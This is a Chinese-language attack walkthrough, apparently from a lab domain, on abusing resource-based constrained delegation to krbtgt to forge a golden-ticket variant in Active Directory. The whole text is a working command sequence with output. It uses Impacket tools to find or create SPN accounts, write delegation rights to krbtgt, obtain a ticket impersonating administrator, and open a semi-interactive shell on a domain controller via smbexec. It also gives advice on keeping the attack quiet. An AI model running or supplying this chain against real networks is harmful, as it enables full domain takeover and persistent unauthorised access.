假设被委派的服务B为krbtgt，而服务A是我们控制的一个服务账户或机器账户。配置服务A到服务B的RBCD，那么我们控制的账户就可以获得KDC服务的ST了（也就是TGT）。

获得KDC的ST后，就可以伪造任何权限用户的TGT，以此打造变种的黄金票据。

一、选择控制的用户

服务A可以是以下几类：

• 已经存在的有SPN的域用户
• 新建机器账户（注：每30天自动更新密码）
• 新建域用户，然后赋予SPN

建议使用第一种已经存在的有SPN的域用户，动静最小化。

1、已经存在的有SPN的域用户

(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/GetUserSPNs.py sec.local/test2:"Az123456@" -dc-ip 10.10.4.2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName        Name  MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------------  ----  --------  --------------------------  --------------------------  ----------
test/testspn1.sec.local:80  hack            2025-06-29 09:56:33.122517  2025-07-08 18:24:12.189432

2、新建机器账户

(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/addcomputer.py sec.local/test2:"Az123456@" -dc-ip 10.10.4.2 -computer-name cmp1 -computer-pass "Az123456@" -method LDAPS
  import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account cmp1$ with password Az123456@.

3、新增SPN

PS C:\Users\Administrator> setspn -U -A priv/golden test3
Checking domain DC=sec,DC=local

Registering ServicePrincipalNames for CN=test3,CN=Users,DC=sec,DC=local
        priv/golden
Updated object
PS C:\Users\Administrator>

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# GetUserSPNs.py sec.local/Administrator:Az123456@ -dc-ip 10.10.4.2
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName        Name           MemberOf                                                                          PasswordLastSet             LastLogon                   Delegation
--------------------------  -------------  --------------------------------------------------------------------------------  --------------------------  --------------------------  ----------
priv/golden1                Administrator  CN=Organization Management,OU=Microsoft Exchange Security Groups,DC=sec,DC=local  2025-02-25 07:13:49.106232  2025-07-12 15:46:58.791715
test/testspn1.sec.local:80  hack                                                                                             2025-06-29 09:56:33.122517  2025-07-12 15:55:44.185581
priv/golden                 test3                                                                                            2025-07-12 16:01:07.498076  <never>

二、委派利用

配置test3到krbtgt的RBCD

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# rbcd.py -delegate-from test3 -delegate-to krbtgt -dc-ip 10.10.4.2 -action write sec.local/administrator:"Az123456@"
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Accounts allowed to act on behalf of other identity:
[*]     test2        (S-1-5-21-2066713137-2133816201-3751750268-1164)
[*]     hack         (S-1-5-21-2066713137-2133816201-3751750268-1103)
[*] Delegation rights modified successfully!
[*] test3 can now impersonate users on krbtgt via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     test2        (S-1-5-21-2066713137-2133816201-3751750268-1164)
[*]     hack         (S-1-5-21-2066713137-2133816201-3751750268-1103)
[*]     test3        (S-1-5-21-2066713137-2133816201-3751750268-1194)

Impacket进行攻击

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# getST.py -dc-ip 10.10.4.2 -spn krbtgt -impersonate administrator sec.local/test3:"Az123456@"
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@krbtgt_SEC.LOCAL@SEC.LOCAL.ccache

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# export KRB5CCNAME=administrator@krbtgt_SEC.LOCAL@SEC.LOCAL.ccache

smbexec.py

(base) ┌──(root㉿Kali)-[~]
└─# smbexec.py administrator@WIN2019-DC1.sec.local -dc-ip 10.10.4.7 -k -no-pass  -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[+] StringBinding ncacn_np:WIN2019-DC1.sec.local[\pipe\svcctl]
[+] Using Kerberos Cache: administrator@krbtgt_SEC.LOCAL@SEC.LOCAL.ccache
[+] Domain retrieved from CCache: sec.local
[+] SPN CIFS/WIN2019-DC1.SEC.LOCAL@SEC.LOCAL not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/SEC.LOCAL@SEC.LOCAL
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.4.7:88
[+] Executing %COMSPEC% /Q /c echo cd  ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\mjPbdjfa.bat & %COMSPEC% /Q /c %SYSTEMROOT%\mjPbdjfa.bat & del %SYSTEMROOT%\mjPbdjfa.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

注：在对Win2019新版本域控失败，旧版本2019成功，2016成功